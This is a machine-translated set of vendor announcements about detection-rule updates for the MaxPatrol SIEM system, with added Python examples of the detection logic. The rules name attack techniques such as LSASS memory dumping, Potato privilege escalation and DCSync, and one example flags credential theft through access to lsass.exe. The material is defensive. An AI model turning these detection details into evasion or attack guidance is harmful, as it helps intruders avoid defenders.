The updated mechanism in MaxPatrol SIEM automates the process chain task. Where the operator previously had to make five or six queries in the SIEM system to find out the sequence in which related processes started, as of February 2023 the chains are assembled automatically and displayed in a dedicated field of the event card.

The product detects suspicious activity initiated by messengers (Telegram, Skype, WhatsApp, Microsoft Teams), web servers, Microsoft Office applications, antivirus programs such as Kaspersky Security Center, and SCCM agents that provide centralized configuration management in the IT infrastructure.
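The chain-building enrichment described above, as an added example in Python that is not Positive Technologies' code: given the process referenced by a correlated event, it walks up the parent links to the root and down to the children, and names the nearest Office, messenger or web-server ancestor of the kind the paragraph lists. The records use Sysmon-style `ProcessGuid` / `ParentProcessGuid` fields; the events and the list of suspicious origins are constructed assumptions of this example.

```python
# Added example, not MaxPatrol SIEM code. Records are constructed in the shape
# of Sysmon ProcessCreate events (ProcessGuid, ParentProcessGuid, Image).
import ntpath
from typing import Dict, List, Optional

# Parents that should not normally spawn shells: Office, messengers, web servers.
SUSPICIOUS_ORIGINS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "telegram.exe", "skype.exe", "whatsapp.exe", "teams.exe",
    "w3wp.exe", "httpd.exe", "nginx.exe",
}


def _name(ev: dict) -> str:
    return ntpath.basename(ev["Image"]).lower()


def ancestors(guid: str, by_guid: Dict[str, dict], limit: int = 32) -> List[dict]:
    """Chain from the oldest known ancestor down to the process itself."""
    chain: List[dict] = []
    seen = set()  # guards against cycles in corrupted or replayed logs
    cur = by_guid.get(guid)
    while cur and cur["ProcessGuid"] not in seen and len(chain) < limit:
        seen.add(cur["ProcessGuid"])
        chain.append(cur)
        cur = by_guid.get(cur["ParentProcessGuid"])  # None once the parent is unknown
    return list(reversed(chain))


def descendants(guid: str, events: List[dict]) -> List[dict]:
    """All processes spawned, directly or indirectly, by guid (depth-first)."""
    out: List[dict] = []
    for child in (e for e in events if e["ParentProcessGuid"] == guid):
        out.append(child)
        out += descendants(child["ProcessGuid"], events)
    return out


def process_chain(guid: str, events: List[dict]) -> dict:
    """The enrichment: chain string, child names and the nearest suspicious origin."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    up = ancestors(guid, by_guid)
    origin: Optional[str] = None
    for ev in reversed(up[:-1]):  # nearest ancestor first, excluding the process itself
        if _name(ev) in SUSPICIOUS_ORIGINS:
            origin = _name(ev)
            break
    return {
        "chain": " > ".join(_name(e) for e in up),
        "children": [_name(e) for e in descendants(guid, events)],
        "suspicious_origin": origin,
    }


# Constructed sample: a macro document spawns cmd -> powershell -> rundll32.
SAMPLE_EVENTS = [
    {"ProcessGuid": "G1", "ParentProcessGuid": "G0", "Image": r"C:\Windows\explorer.exe"},
    {"ProcessGuid": "G2", "ParentProcessGuid": "G1", "Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE"},
    {"ProcessGuid": "G3", "ParentProcessGuid": "G2", "Image": r"C:\Windows\System32\cmd.exe"},
    {"ProcessGuid": "G4", "ParentProcessGuid": "G3",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessGuid": "G5", "ParentProcessGuid": "G4", "Image": r"C:\Windows\System32\rundll32.exe"},
    {"ProcessGuid": "G6", "ParentProcessGuid": "G1", "Image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    # G4 is the process a "suspicious PowerShell" rule would have fired on.
    print(process_chain("G4", SAMPLE_EVENTS))
```

The five or six manual queries the text mentions correspond to the parent lookups the `ancestors` loop performs; the cycle guard and the `limit` matter in practice because GUID collisions or replayed logs can otherwise make the walk loop forever.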

In addition, Positive Technologies experts have updated the examination packages for detecting attacks using the MITRE ATT&CK model. The rules added to MaxPatrol SIEM allow you to identify:

  • use of the LSASS Shtinkering technique (a method of dumping LSASS process memory via the Windows Error Reporting service) and Dirty Vanity (a code injection method for bypassing endpoint protection); both techniques appeared in attackers' arsenals in December 2022;
  • exploitation of vulnerabilities in the RC4 encryption algorithm that allow remote access to the system or code execution, as well as exploitation of a family of coerced authentication vulnerabilities that allow obtaining the NTLM hash of a Windows service account.

"The expertise packages loaded into MaxPatrol SIEM earlier are updated with rules as various attack methods emerge. Positive Technologies experts continuously analyze current cyber threats and develop rules for detecting tactics, techniques and methods of exploiting vulnerabilities that attackers have only just adopted. In addition, some long-known vulnerabilities in the RPC service related to coerced authentication have not been officially recognized as vulnerabilities and will not be fixed by Microsoft, and the updated package will help information security specialists detect attempts to exploit them and take action in time," noted Kirill Kiryanov, Head of Endpoint Attack Detection at Positive Technologies.

To start using the mechanism for building chains of started processes, you need to update MaxPatrol SIEM to version 7.0 and install an updated examination package.

Add four packages to identify attacks on the domain infrastructure

New attack detection rules have been loaded into the MaxPatrol SIEM information security event monitoring system, Positive Technologies announced on January 27, 2023. Four expertise packages received updates: "Attacks on Microsoft Active Directory", "Privilege Escalation and Command and Control tactics (MITRE ATT&CK)", "Attacks using specialized software" and "Persistence tactic (MITRE ATT&CK)".

As part of the update, 31 rules were added to MaxPatrol SIEM. {{quote "The most important rules in the published updates are perhaps those related to detecting attacks on Microsoft Active Directory," said Yulia Fomina, senior specialist in the attack detection department, Positive Technologies. "Companies face such threats every day; attackers use them actively. The update also includes rules for identifying techniques that attackers have used for a long time and that have not lost their relevance." }}

The review package updates downloaded into MaxPatrol SIEM will help you identify:

  • Attacks on Microsoft Active Directory that allow attackers to gain maximum rights in the domain infrastructure. Active Directory weaknesses are exploited by attackers in practice; in particular, since spring 2022 attacks on Active Directory Certificate Services (AD CS) have been observed. They can be exploited even on patched systems if certificate templates are misconfigured. The new rules identify such attacks at every stage: misconfiguration of templates, exploitation, and subsequent use of the obtained certificate for lateral movement through the infrastructure.
  • Exploitation of the Kerberos Relay vulnerability in Microsoft Active Directory. It abuses features of the Kerberos domain authentication protocol to escalate privileges on any domain computer (from an unprivileged account to SYSTEM) and gain a foothold. Two new rules in MaxPatrol SIEM detect this activity.
  • The classic Silver Ticket attack on the Kerberos protocol. A rule with a new detection method was added: based on a number of red team projects and pentests, Positive Technologies experts found certain anomalies in user authentication via Kerberos.
  • Exploitation of the well-known series of Potato vulnerabilities: Juicy Potato, MultiPotato, Remote Potato and Rogue Potato form one family whose exploitation lets attackers escalate from a service account to SYSTEM.
  • Token manipulation to escalate privileges in the system.
  • Exploitation of vulnerabilities in the Windows print service (CVE-2022-21999 and CVE-2022-30206) that allow privilege escalation.
  • The classic method of escalating to SYSTEM when local administrator rights are already held: escalation through named pipes. This is the default method offered by frameworks such as Cobalt Strike, Metasploit and Empire.

To begin using this examination package, you must upgrade MaxPatrol SIEM to version 7.0 or 7.1 and install the rules from the examination package.

Compatibility with "Kvant-CHEAZ" software and hardware

The MaxPatrol SIEM information security event monitoring system and the Kvant-CHEAZ software and hardware complex (CAS "Kvant-CHEAZ") passed compatibility tests. This was announced on January 10, 2023 by Positive Technologies. MaxPatrol SIEM provided monitoring of the Kvant-CHEAZ complex and detection of information security incidents. CAS "Kvant-CHEAZ" performed all of its functions in accordance with the industry requirements for industrial control systems (APCS): data and command exchange time, absence of failures and faults, and no loss of transmitted data. Read more here.

2022

Examination package with mechanism for automatic exclusion of false positives of correlation rules

The updated MaxPatrol SIEM examination package (MaxPatrol SIEM is an information security event monitoring and incident detection system) includes automatic whitelisting, a mechanism for automatically excluding false positives of correlation rules. By optimizing routine tasks, information security analysts can save up to 250 man-hours per week when analyzing triggers and selecting real incidents, and can quickly adapt the SIEM system to their infrastructure during implementation. This was announced on December 14, 2022 by Positive Technologies.

{{quote "There are countless programs running in infrastructures, and ordinary users take millions of actions every day that information security products need to distinguish from the activity of cybercriminals. In this situation, any means of protection can generate false positives, that is, erroneously recognize activity as illegitimate. The need to work with false positives is a well-known fact faced by users of various information security products, including SIEM systems. For example, according to a survey by the Center for Long-Term Cybersecurity, 36% of specialists note that they receive too many false positives when using the ATT&CK framework. As a result, analysts have to process the triggering of correlation rules and manually weed out false positives. This is a labor-intensive process: due to the large number of false positives, the risk of missing a cyber attack increases, - said Yulia Fomina, senior specialist in the expert services and development department of SOC, Positive Technologies. - A mechanism has been added to MaxPatrol SIEM that allows you to automatically add legitimate repeating activity to exceptions. }}

Only identified event keys that have been detected repeatedly are whitelisted. After that, MaxPatrol SIEM considers the activity typical for the specific infrastructure and no longer generates a trigger. Events that are deliberately left unreported in this way may include, for example, background activity of the operating system, the operation of administration scripts, and the regular start of processes on a schedule, in particular checks of the infrastructure by security scanners or the work of build agents.

Automatic whitelisting also provides for cases of repeated incidents of a complex nature, for example systematic internal violations of the information security policy. First, the mechanism marks up to five triggers as possible false positives and places them in a dedicated temporary tabular list; the SOC operator should then blacklist such events by one or more criteria (host name, user name or trigger key) so that they are not whitelisted.

In addition, MaxPatrol SIEM still has the ability to add exceptions using templates prepared by Positive Technologies experts. Templates are a mechanism that allows an operator, with one click from an event card, to enter certain fields into tabular lists for whitelisting, blacklisting, recording indicators of compromise, and more.
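The mechanism described above, as an added illustration. This is not MaxPatrol SIEM's code: the event-key layout (rule, host, user, trigger key), the return values and the five-trigger review limit are assumptions taken only from the description, and the scanner and policy-violation scenario in `demo()` is constructed.

```python
"""Added illustration of automatic whitelisting for correlation-rule triggers.

Assumptions (not MaxPatrol SIEM internals): a trigger is identified by
(rule, host, user, trigger_key); the first REVIEW_LIMIT triggers of a key are
reported as possible false positives and kept in a temporary review list; after
that the key is whitelisted unless the operator has blacklisted it by host,
user or trigger key.
"""
from collections import Counter
from dataclasses import dataclass, field

REVIEW_LIMIT = 5  # assumed: triggers marked "possible false positive" before auto-whitelisting


@dataclass
class AutoWhitelist:
    counts: Counter = field(default_factory=Counter)  # how often each event key has fired
    review: dict = field(default_factory=dict)        # temporary list of possible false positives
    whitelist: set = field(default_factory=set)       # keys considered typical for this infrastructure
    blacklist: set = field(default_factory=set)       # (rule, field, value) criteria set by the operator

    def add_blacklist(self, rule, field_name, value):
        """Operator decision: never whitelist triggers of `rule` that match this criterion."""
        self.blacklist.add((rule, field_name, value))

    def is_blacklisted(self, rule, host, user, trigger_key):
        fields = {"host": host, "user": user, "key": trigger_key}
        return any((rule, f, v) in self.blacklist for f, v in fields.items())

    def process(self, rule, host, user, trigger_key):
        """Classify one trigger: 'alert', 'alert_possible_fp' or 'suppressed'."""
        key = (rule, host, user, trigger_key)
        if self.is_blacklisted(rule, host, user, trigger_key):
            self.review.pop(key, None)
            return "alert"  # systematic violation: always escalate, never whitelist
        if key in self.whitelist:
            return "suppressed"
        self.counts[key] += 1
        if self.counts[key] <= REVIEW_LIMIT:
            self.review[key] = self.counts[key]  # operator sees it while it is still under review
            return "alert_possible_fp"
        # Seen repeatedly and the operator did not object: legitimate repeating activity
        self.review.pop(key, None)
        self.whitelist.add(key)
        return "suppressed"


def demo():
    """Constructed scenario: a scheduled scanner versus a repeated policy violation."""
    wl = AutoWhitelist()
    scanner = ("Suspicious_Port_Scan", "scanner01", "svc_scan", "tcp_scan")
    scanner_results = [wl.process(*scanner) for _ in range(7)]
    # The operator blacklists a user whose repeated behaviour is a real policy violation.
    wl.add_blacklist("Admin_Share_Access", "user", "j.doe")
    violation_results = [wl.process("Admin_Share_Access", "ws-17", "j.doe", "ADMIN$") for _ in range(7)]
    return scanner_results, violation_results


if __name__ == "__main__":
    print(demo())
```

The scanner key is reported five times as a possible false positive and then silently whitelisted; the blacklisted user's triggers keep producing full alerts no matter how often they repeat, which is the behaviour the blacklist criteria exist for.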

"In order for a security tool to adapt to the features of the infrastructure, when implementing SIEM systems analysts have to manually write exceptions for correlation rules for several months," said Petr Kovchunov, specialist in the knowledge base development department, Positive Technologies. "In MaxPatrol SIEM, you can enable automatic whitelisting, which will identify repeated activities of the same type, recognize them as natural for your infrastructure and stop notifying operators about them. The mechanism we developed increases the efficiency of MaxPatrol SIEM and, as a result, allows you to unload analysts. They can devote the freed-up time to tasks where experts cannot be replaced, for example proactive threat hunting and incident investigation."

To start using automatic whitelisting, you need to upgrade MaxPatrol SIEM to version 7.0 and install the updated examination package.

Examination package to identify suspicious activity in resources posted on Yandex Cloud services

On December 1, 2022 , Positive Technologies announced that an expertise package has been added to the MaxPatrol SIEM information security event monitoring system to identify suspicious activity in resources hosted by users in Yandex Cloud services. Rules uploaded to the system allow you to detect early attempts by attackers to violate the privacy, integrity and availability of data stored on the cloud platform.


According to the company, as of November 2022 more than 19 thousand companies use Yandex Cloud services every day. The public cloud platform provides corporations, midsize businesses and private developers with scalable infrastructure, development tools, storage services and machine learning tools. As part of the import substitution course, Russian businesses that previously used foreign cloud services are actively transferring resources, as well as the development and operation of internal and client applications, to Yandex Cloud.

In September 2022, Positive Technologies specialists developed an integration module (connector) for MaxPatrol SIEM. It uploads to the system data about events that occur with the resources that companies place in Yandex Cloud. The next stage of cooperation with the cloud platform was the release of an expertise package. It includes 17 rules for detecting suspicious activity in the most popular services: Compute Cloud (virtual machines and disks), Object Storage (scalable data storage), Key Management Service (encryption key management), Identity and Access Management (identification and access control for cloud resources), Yandex Lockbox (creation and storage of secrets in the platform infrastructure), and the managed database services (ClickHouse, MongoDB, Redis, MySQL, PostgreSQL).

"Companies in Russia are increasingly choosing cloud platforms, which creates the need to pay attention to any atypical activity associated with the resources placed there. Leakage, loss of data availability and the spread of malware through public resources are business risks, the likelihood of which, depending on the attack vector, may also depend on the platform's users. The expertise package includes rules to help identify suspicious activity in popular Yandex Cloud services. In addition, we have developed rules for MaxPatrol SIEM that detect suspicious activity related to accounts across the entire platform for all events arriving in MaxPatrol SIEM. To detect potentially dangerous activity, mechanisms for enriching information security events with relevant data and tabular lists are used," said David Nikachadze, specialist of the knowledge base and information security expertise department, Positive Technologies.

With updated rules, MaxPatrol SIEM detects:

  • For the Object Storage service:
    • illegitimate provision of public access to storage objects, buckets (violates the confidentiality of resources placed on the platform and may indicate that attackers are using this access to distribute malware and for other destructive actions).
  • For the managed database services (ClickHouse, PostgreSQL, MySQL, MongoDB, Redis):
    • creation of a database cluster by a user who is not in the list of administrators (may indicate malicious activity in the system).
  • For Identity and Access Management:
    • suspicious activity of privileged accounts that have access to all resources (a critically dangerous event that may indicate the presence of intruders in the system);
    • activity of service accounts from IP address ranges outside the cloud (may be one of the signs of infrastructure compromise).
  • For the Compute Cloud service:
    • creation of a virtual machine with an IP address that is already in use (in this way attackers, as a rule, hide their presence in the system or collect confidential data by intercepting network traffic);
    • detection of sensitive information in user metadata when a virtual machine is created (a clear violation of data confidentiality that can lead to its leakage);
    • illegitimate provision of serial console access to a virtual machine (rarely used in legitimate scenarios, so each such case requires additional verification and investigation);
    • assignment to a virtual machine of a service account that has access to Yandex Lockbox secrets (indicates incorrect delimitation of resource access rights, which is fraught with data leakage).
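The detection logic for several of the rules listed above, as an added example that is not part of the expertise package and not Positive Technologies' code. The audit events, their type and field names, the cloud address range, the administrator list and the metadata markers are all constructed for the example; they are not the real Yandex Audit Trails schema.

```python
"""Added example: rule logic over constructed cloud audit events.

Everything here is an assumption for illustration: the event types and field
names are a simplified stand-in for cloud audit records, CLOUD_RANGES is an
assumed internal address space, DB_ADMINS an assumed administrator list.
"""
import ipaddress

CLOUD_RANGES = [ipaddress.ip_network("10.128.0.0/9")]  # assumed internal cloud address space
DB_ADMINS = {"dba@example.corp"}                        # assumed list of database administrators
SECRET_MARKERS = ("password", "token", "secret")        # assumed markers of sensitive metadata

# Constructed sample events (not real audit records).
SAMPLE_EVENTS = [
    {"type": "compute.instance.create", "subject": "dev@example.corp", "subject_type": "user",
     "source_ip": "10.128.0.20",
     "details": {"ip": "10.128.0.5", "metadata": {"user-data": "#cloud-config"}}},
    {"type": "storage.bucket.update", "subject": "dev@example.corp", "subject_type": "user",
     "source_ip": "10.128.0.20", "details": {"bucket": "backups", "public_read": True}},
    {"type": "mdb.postgresql.cluster.create", "subject": "dev@example.corp", "subject_type": "user",
     "source_ip": "10.128.0.20", "details": {"cluster": "pg-shadow"}},
    {"type": "compute.instance.create", "subject": "sa-deploy", "subject_type": "service_account",
     "source_ip": "203.0.113.7",
     "details": {"ip": "10.128.0.5", "metadata": {"db-password": "hunter2"},
                 "serial_port_enabled": True}},
    {"type": "mdb.mysql.cluster.create", "subject": "dba@example.corp", "subject_type": "user",
     "source_ip": "10.128.1.1", "details": {"cluster": "orders"}},
]


def in_cloud(ip):
    """True if the source address belongs to the (assumed) cloud address space."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUD_RANGES)


def detect(events):
    """Return (event index, rule name) pairs for every rule that fires."""
    findings = []
    used_ips = set()  # IP addresses already assigned to virtual machines
    for i, ev in enumerate(events):
        kind, subj, src = ev["type"], ev["subject"], ev["source_ip"]
        d = ev.get("details", {})
        # Object Storage: bucket made publicly readable
        if kind == "storage.bucket.update" and d.get("public_read"):
            findings.append((i, "public bucket access"))
        # Managed databases: cluster created by someone outside the admin list
        if kind.startswith("mdb.") and kind.endswith(".cluster.create") and subj not in DB_ADMINS:
            findings.append((i, "db cluster created by non-admin"))
        # IAM: service account acting from an address outside the cloud
        if ev.get("subject_type") == "service_account" and not in_cloud(src):
            findings.append((i, "service account active from outside cloud"))
        # Compute Cloud: checks on virtual machine creation
        if kind == "compute.instance.create":
            ip = d.get("ip")
            if ip in used_ips:
                findings.append((i, "vm created with already used ip"))
            used_ips.add(ip)
            meta = " ".join(f"{k}={v}" for k, v in d.get("metadata", {}).items()).lower()
            if any(m in meta for m in SECRET_MARKERS):
                findings.append((i, "sensitive data in vm metadata"))
            if d.get("serial_port_enabled"):
                findings.append((i, "serial console enabled"))
    return findings


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The reused-IP rule is stateful: it needs the set of addresses already assigned, which in a SIEM would come from a tabular list filled by earlier events rather than from a local variable.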

Loading an examination package to identify 13 attacker activities related to malware

Positive Technologies announced on October 28, 2022 that an examination package had been loaded into the MaxPatrol SIEM information security event monitoring system. The rules added to the system allow you to identify 13 attacker activities related to the use of malware (HVE). Event sources for MaxPatrol SIEM can be common security tools such as the PT Sandbox, Windows Defender, and Kaspersky Lab and Dr.Web products.


With these rules, based on PT Sandbox verdicts and antivirus triggers, the SIEM system correlates potentially dangerous incidents and additionally draws attention to the users involved. The added capabilities help information security specialists navigate a huge stream of events and monitor the status of detected threats in "single window" mode, that is, in the MaxPatrol SIEM interface.

"Encoders, loaders, banking trojans and other malware are the scourge of companies. According to Positive Technologies data, in the second quarter of 2022 attackers attacked every second organization using malware. Antiviruses and sandboxes such as PT Sandbox effectively detect malware. In order for information security specialists to quickly identify complex attacks, the MaxPatrol SIEM interface now displays critical incidents with malware (HVE) generated by correlation rules. This helps the operator understand which cases should be thoroughly investigated," commented Konstantin Grishchenko, head of information security monitoring at Positive Technologies.

In addition, the integration with PT Sandbox has been expanded. Analyzing the verdicts of the Positive Technologies sandbox, MaxPatrol SIEM now determines:

  • malicious files - the decision is made based on the results of all PT Sandbox checks;
  • running malicious files;
  • suspicious mail activity (detection of spam mailings by sender, headers and attachments).

The rules added to the examination package reveal, for example, the following activities:

  • ESR detected and removed (or not removed) within five minutes;
  • Windows Defender is disabled;
  • Kaspersky Endpoint Security is prohibited from launching a malicious application;
  • Kaspersky Endpoint Security has stopped or disabled its security components;
  • The Kaspersky Security Center installation packages have been modified.

To start using the examination package, you need to update MaxPatrol SIEM to version 7.0 and install the rules from the examination package.

Yandex Cloud Integration

MaxPatrol SIEM was integrated with Yandex Cloud and with the Yandex Audit Trails service for collecting and uploading audit logs from the cloud. Positive Technologies and cloud platform specialists developed a connector that uploads to MaxPatrol SIEM data about events occurring with the resources that organizations place in Yandex Cloud. Positive Technologies announced this on September 29, 2022.

"The need for this integration was indicated by MaxPatrol SIEM users who had placed their cloud resources in foreign services, Amazon and Microsoft, and had recently transferred them to Yandex Cloud. At the same time, the need to analyze all security events in the cloud remained. They turned to Positive Technologies with a proposal to develop an integration module, which was done," noted Dmitry Orkin, Head of Cloud Security at Yandex Cloud.

"If an organization moves some of its resources to Yandex Cloud, it has to monitor what is happening to them from a security point of view. For example, if a company was attacked from the inside and malware was embedded in its cloud, MaxPatrol SIEM can show the entire sequence of the attacker's actions both inside the perimeter and in the resources deployed in Yandex Cloud. MaxPatrol SIEM users can write correlation rules on the events they receive from the cloud," said Roman Sergeyev, Development Manager of MaxPatrol SIEM, Positive Technologies.

Yandex Audit Trails, which accumulates audit logs for sending to MaxPatrol SIEM, is at the preview stage as of September 2022 and is a free service. The user can choose which resources in the cloud to collect logs from, and configure the upload of audit logs to an encrypted bucket for storage and subsequent analysis. Among the types of events registered by the Yandex Audit Trails service are the creation and deletion of service accounts, changes to user roles, the creation and deletion of resources, and changes to their parameters, access policies and security groups.

"The compatibility of MaxPatrol SIEM with Yandex Cloud will be of interest to users of both products, in particular companies in retail and e-commerce, the power industry, manufacturers of medicines and pharmacies, and developers of digital products and solutions. Yandex Cloud is one of the big cloud providers. Clouds are a direction of development for cybersecurity, and the company considers Yandex Cloud one of its technology partners in this area," commented Anton Alexandrov, Head of Business Development at Positive Technologies.

Integration with Yandex Cloud is available starting with MaxPatrol SIEM 7.0.

Adding 42 Rules to Previously Loaded Examination Packages

The MaxPatrol SIEM information security event monitoring system has received an update to previously downloaded examination packages to identify techniques for hiding attackers and signs of known hacker tools. Detection rules are aimed at detecting advanced methods of masking cybercriminals in the infrastructure and the activity of frameworks often used in targeted attacks. This was announced by Positive Technologies on September 23, 2022.

Attackers are constantly modifying their tools, techniques and attack methods, as well as developing ways to bypass security tools and hide their presence in the infrastructure of compromised companies. MaxPatrol SIEM included 42 rules added to previously downloaded examination packages. They allow MaxPatrol SIEM users to identify the most current attack techniques and ways to mask malicious activity. Among them, in particular:

  • use of the Cobalt Strike framework: attackers use it to manage the seized infrastructure, for post-exploitation of vulnerabilities, lateral movement within the organization's network, establishing persistence on resources and expanding their presence;
  • a hidden connection to a shadow RDP session: attackers use it to monitor user activity during an RDP session in order to obtain data (for example, to determine how a person works and what characteristic risks this entails);
  • updated and less well-known techniques for gaining access to the lsass.exe process, where credentials are stored;
  • techniques of the "Moving inside the perimeter" tactic (Lateral Movement in the MITRE ATT&CK model): attackers use them to gain access to and control remote systems on the network, install malware and gradually expand their presence in the infrastructure.

"The attackers' techniques and tools are actively developing, and with them the means of defense, which must be regularly replenished with up-to-date expertise to counter such attack methods. Studies of cyber threats and well-known hacker frameworks show that in 2022 attackers are paying more and more attention to masking: knowing the current detection methods, they invent others that make it as difficult as possible to detect malicious activity. This means that information security events must be studied more deeply and thoroughly than before. For example, Sysmon event 10 indicates that attackers are trying to obtain credentials through access to the memory of the lsass.exe process. To identify this cyber threat, information security tools are tuned exclusively to catch this event. However, attackers have modernized their techniques for gaining access to this process so as to avoid direct access to lsass.exe memory and the generation of a Sysmon 10 event. Such advanced techniques can no longer be detected in classical ways, so we have written additional rules covering the updated concealment methods. The updates will help MaxPatrol SIEM users identify suspicious activity in a timely manner and prevent an attack from developing," commented Kirill Kiryanov, leading specialist in the expert services and development department of the Positive Technologies Expert Security Center (PT ESC).
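The classic Sysmon event 10 check that the quote refers to, written out as an added example (not a MaxPatrol SIEM rule and not Positive Technologies' code). The two event records are constructed, the allowlist of images that may legitimately open lsass.exe is an assumption, and, as the quote says, this only covers the direct-access case: techniques that avoid opening lsass.exe memory produce no event 10 and need other rules.

```python
"""Added example: flag Sysmon Event ID 10 (ProcessAccess) on lsass.exe.

Assumptions: the two XML records below are constructed, TRUSTED_SOURCES is an
assumed allowlist, and 0x0010 is PROCESS_VM_READ, the right needed to read
another process's memory.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PROCESS_VM_READ = 0x0010
TRUSTED_SOURCES = {  # assumed allowlist of images that legitimately access lsass.exe
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon records (not captured from a real host).
SUSPICIOUS_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>10</EventID><Computer>ws-17</Computer></System>
  <EventData>
    <Data Name="UtcTime">2022-09-23 10:15:02.123</Data>
    <Data Name="SourceProcessId">4812</Data>
    <Data Name="SourceImage">C:\Users\Public\tool.exe</Data>
    <Data Name="TargetProcessId">688</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1010</Data>
  </EventData>
</Event>"""

DEFENDER_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>10</EventID><Computer>ws-17</Computer></System>
  <EventData>
    <Data Name="UtcTime">2022-09-23 10:15:03.456</Data>
    <Data Name="SourceProcessId">3120</Data>
    <Data Name="SourceImage">C:\Program Files\Windows Defender\MsMpEng.exe</Data>
    <Data Name="TargetProcessId">688</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1410</Data>
  </EventData>
</Event>"""


def parse_sysmon_event(xml_text):
    """Return (EventID, {Data Name: text}) from a Sysmon event rendered as XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def lsass_access_alert(xml_text):
    """Return alert details when an untrusted process opens lsass.exe with memory-read rights."""
    event_id, d = parse_sysmon_event(xml_text)
    if event_id != 10:
        return None
    if not d.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    if d.get("SourceImage", "").lower() in TRUSTED_SOURCES:
        return None
    granted = int(d.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return None  # handle without read rights cannot dump memory
    return {
        "computer": d.get("Computer", ""),
        "source_image": d["SourceImage"],
        "source_pid": int(d["SourceProcessId"]),
        "granted_access": hex(granted),
    }


if __name__ == "__main__":
    print(lsass_access_alert(SUSPICIOUS_EVENT))
    print(lsass_access_alert(DEFENDER_EVENT))
```

Matching on the access mask rather than on an exact value such as 0x1010 matters: the mask differs between tools, but any of them needs PROCESS_VM_READ to read memory, so that bit is the stable part of the signal.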

To start using the added rules, you need to upgrade the product to version 7.0 and install the rules from the examination package.

Adding Active Directory Attack Detection Rules

Positive Technologies announced on August 1, 2022 that the MaxPatrol SIEM information security event monitoring system received an updated examination package. It allows you to identify ten more signs of malicious activity with more accuracy and fewer false positives - thanks to integration with MaxPatrol VM and PT Network Attack Discovery (PT NAD).

The added rules detect attacks on Active Directory using the DCShadow and DCSync techniques, the use of the BloodHound utility by attackers for domain reconnaissance and collection of domain user records, attempts to exploit vulnerabilities from the CVE database, and other dangerous actions.

The added examination package contains correlation rules based on analyzing network traffic using PT Network Attack Discovery, as well as collecting information about IT assets in MaxPatrol VM. Together, the products provide a more complete picture of the IT infrastructure, and the ability to enrich incidents with context from other systems increases the accuracy and speed of detecting attacks inside the protected perimeter.

"The updated threat detection rules in MaxPatrol SIEM will help detect current attack scenarios inside the perimeter and stop attackers before unacceptable business events occur. In addition, with this examination package users receive tight integration of MaxPatrol SIEM with the PT Network Attack Discovery (PT NAD) behavioral traffic analysis system and the MaxPatrol VM vulnerability management solution. This will simplify the work of detecting anomalies in the infrastructure, and specialists will be able to use the bundle of Positive Technologies products more efficiently than before. For example, you can now see in the MaxPatrol SIEM interface all the data needed to investigate an incident instead of searching for it yourself on the timeline, and you can follow the associated links to the relevant event cards in the other products," noted Danil Spiridonov, specialist in the knowledge base development department, Positive Technologies.

The added rules will help information security specialists conduct a more detailed investigation of incidents. By analyzing server logs and signatures, that is, using data obtained from PT NAD, MaxPatrol SIEM detects:

  • Attacks using DCShadow and DCSync techniques. Their special implementation will allow attackers to obtain domain user accounts.
  • Transferring DNS zone from DNS server. Using a DNS zone dump, an attacker can get additional information about the structure of the attacked network.
  • Using the Bloodhound utility. MaxPatrol SIEM detects the launch of this program, and PT NAD for network traffic analysis determines that the utility has begun to collect user domain records on the compromised node.
  • The use by attackers of the Discovery technique, which can be a sign of studying the configuration of the network, accounts, etc.
  • Attempts to exploit CVE-2021-42287 vulnerabilities (user account name substitution) and CVE-2021-42278 (key center deception) in the Active Directory directory service, which allow attackers to seize control of Windows domains.
  • Suspicious network activity from one node to many nodes, which can indicate network scanning and moving an attacker inside the perimeter.
  • Abnormal network activity of several infected nodes, directed to one specific node, which may be outside the perimeter of the organization.
  • The use of hacker utilities, including for tunneling traffic (they are used by cybercriminals to bypass security tools and transmit malware traffic).
  • Triggering of indicators of compromise (IoC) compiled by the Positive Technologies Expert Security Center (PT ESC) based on continuous monitoring of current cyber threats, investigations of complex information security incidents in companies of various profiles, and analysis of the techniques and tools of APT groups. This will allow MaxPatrol SIEM users to react to abnormal activity (the system will show from which node in the network the attack is developing and which node was compromised) and prevent the attack from developing within the network in time.

Companies that use the MaxPatrol VM vulnerability management system in addition to MaxPatrol SIEM and PT NAD will be able to identify cases where attackers exploit vulnerabilities with assigned CVE identifiers. MaxPatrol VM scans assets for vulnerabilities, MaxPatrol SIEM compiles a table of nodes and the vulnerabilities they carry that are known for 2022 and entered in the CVE database, and PT NAD in turn detects in network traffic attempts to exploit a particular vulnerability on a particular node. This automates the work of SOC analysts with threat alerts from PT NAD and with potential cases of vulnerability exploitation, and eliminates false positives from Internet scanning bots.

To start using the updated examination package, you need to upgrade MaxPatrol SIEM to version 7.0 and install the rules from this package. Cross-references between the products will appear automatically when the PT Knowledge Base, which is part of MaxPatrol SIEM, is updated.

Release of MaxPatrol SIEM 7.0

